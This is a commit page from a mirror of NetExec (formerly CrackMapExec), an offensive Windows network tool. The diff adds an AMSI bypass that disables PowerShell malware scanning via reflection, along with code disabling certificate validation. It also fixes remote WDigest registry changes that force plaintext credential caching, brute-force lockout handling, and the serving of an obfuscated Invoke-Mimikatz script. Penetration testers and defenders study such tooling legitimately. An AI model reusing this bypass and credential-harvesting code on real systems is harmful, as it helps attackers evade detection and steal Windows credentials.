swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Implemented @mattifestation's AMSI bypass and multiple bugfixes 

- @mattifestation's AMSI bypass now gets called before executing
  powershell commands or scripts

- Squashed some bugs related to account bruteforcing, enumerating users
  and creating/deleting the UseLogonCredential reg key
main
byt3bl33d3r 2016-08-06 10:28:16 -06:00
parent 8ddfcb10e4
commit 6f2596902c
5 changed files with 31 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
cme/connection.py
View File

@ -211,10 +211,10 @@ class Connection:
if not domain: domain = self.domain
if self.args.domain: domain = self.args.domain
if credtype == 'hash' and not self.over_fail_limit():
if credtype == 'hash' and not self.over_fail_limit(username):
self.hash_login(domain, username, password)
elif credtype == 'plaintext' and not self.over_fail_limit():
elif credtype == 'plaintext' and not self.over_fail_limit(username):
self.plaintext_login(domain, username, password)
except IndexError:

23
cme/credentials/wdigest.py
View File

@ -22,7 +22,7 @@ class WDIGEST:
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00')
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
@ -46,15 +46,26 @@ class WDIGEST:
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
try:
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except:
self.logger.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException:
self.logger.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
try:
remoteOps.finish()
except:
pass

2
cme/enum/users.py
View File

@ -60,7 +60,7 @@ class SAMRDump:
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(self.__port)
if hasattr(rpctransport, setRemoteHost):
if hasattr(rpctransport, 'setRemoteHost'):
rpctransport.setRemoteHost(self.__addr)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.

11
cme/helpers.py
View File

@ -3,6 +3,7 @@ import string
import re
import cme
import os
import logging
from base64 import b64encode
from termcolor import colored
@ -43,7 +44,15 @@ def obfs_ps_script(script, function_name=None):
return strippedCode
def create_ps_command(ps_command, force_ps32=False):
ps_command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + ps_command
ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
try{{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}}catch{{}}
{}
""".format(ps_command)
logging.debug('Unincoded command:\n' + ps_command)
if force_ps32:
command = """$command = '{}'
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')

2
cme/modules/mimikatz.py
View File

@ -55,7 +55,7 @@ class CMEModule:
request.send_response(200)
request.end_headers()
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)